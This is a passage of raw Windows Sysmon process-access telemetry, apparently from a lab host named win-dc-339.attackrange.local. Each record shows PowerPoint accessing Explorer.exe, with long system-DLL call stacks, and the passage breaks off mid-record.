14:59:08.325{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.325{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x800000000000000081585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.278{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.262{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.262{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.262{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.262{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x800000000000000081580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.262{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.262{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\comdlg32.dll+1e967|C:\Windows\System32\shlwapi.dll+9fc1|C:\Windows\System32\shlwapi.dll+9edd|C:\Windows\System32\shlwapi.dll+9d96|C:\Windows\System32\shlwapi.dll+9c0d|C:\Windows\System32\SHELL32.dll+13fd37|C:\Windows\System32\SHELL32.dll+13f1b8|C:\Windows\System32\SHELL32.dll+13edbb|C:\Windows\System32\SHELL32.dll+13ef27|C:\Windows\System32\SHELL32.dll+13eeaa|C:\Windows\System32\comdlg32.dll+10e08 10341000x800000000000000081577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\comdlg32.dll+1e967|C:\Windows\System32\shlwapi.dll+9fc1|C:\Windows\System32\shlwapi.dll+9edd|C:\Windows\System32\shlwapi.dll+9d96|C:\Windows\System32\shlwapi.dll+9c0d|C:\Windows\System32\SHELL32.dll+13fd37|C:\Windows\System32\SHELL32.dll+13f1b8|C:\Windows\System32\SHELL32.dll+13edbb|C:\Windows\System32\SHELL32.dll+13ef27|C:\Windows\System32\SHELL32.dll+13eeaa|C:\Windows\System32\comdlg32.dll+10e08 10341000x800000000000000081576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\comdlg32.dll+1e967|C:\Windows\System32\shlwapi.dll+9fc1|C:\Windows\System32\shlwapi.dll+9edd|C:\Windows\System32\shlwapi.dll+9d96|C:\Windows\System32\shlwapi.dll+9c0d|C:\Windows\System32\SHELL32.dll+13fd37|C:\Windows\System32\SHELL32.dll+13f1b8 10341000x800000000000000081575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\comdlg32.dll+1e967|C:\Windows\System32\shlwapi.dll+9fc1|C:\Windows\System32\shlwapi.dll+9edd|C:\Windows\System32\shlwapi.dll+9d96|C:\Windows\System32\shlwapi.dll+9c0d|C:\Windows\System32\SHELL32.dll+13fd37|C:\Windows\System32\SHELL32.dll+13f1b8|C:\Windows\System32\SHELL32.dll+13edbb 10341000x800000000000000081574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+100303|C:\Windows\System32\SHELL32.dll+100a64|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x800000000000000081573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+100303|C:\Windows\System32\SHELL32.dll+100a64|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x800000000000000081572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+100303|C:\Windows\System32\SHELL32.dll+100a64|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x800000000000000081571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+100303|C:\Windows\System32\SHELL32.dll+100a64|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 10341000x800000000000000081570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da75e|C:\Windows\System32\windows.storage.dll+dab96|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814 10341000x800000000000000081569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da875|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+d1ab1|C:\Windows\System32\windows.storage.dll+d3426|C:\Windows\System32\windows.storage.dll+d3ca1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e6dc|C:\Windows\System32\SHELL32.dll+6e225|C:\Windows\System32\SHELL32.dll+6ed3d|C:\Windows\System32\SHELL32.dll+7235f|C:\Windows\System32\SHELL32.dll+13fb0e|C:\Windows\System32\SHELL32.dll+13f726|C:\Windows\System32\SHELL32.dll+13f1a3|C:\Windows\System32\SHELL32.dll+13edbb 10341000x800000000000000081568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.184{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft 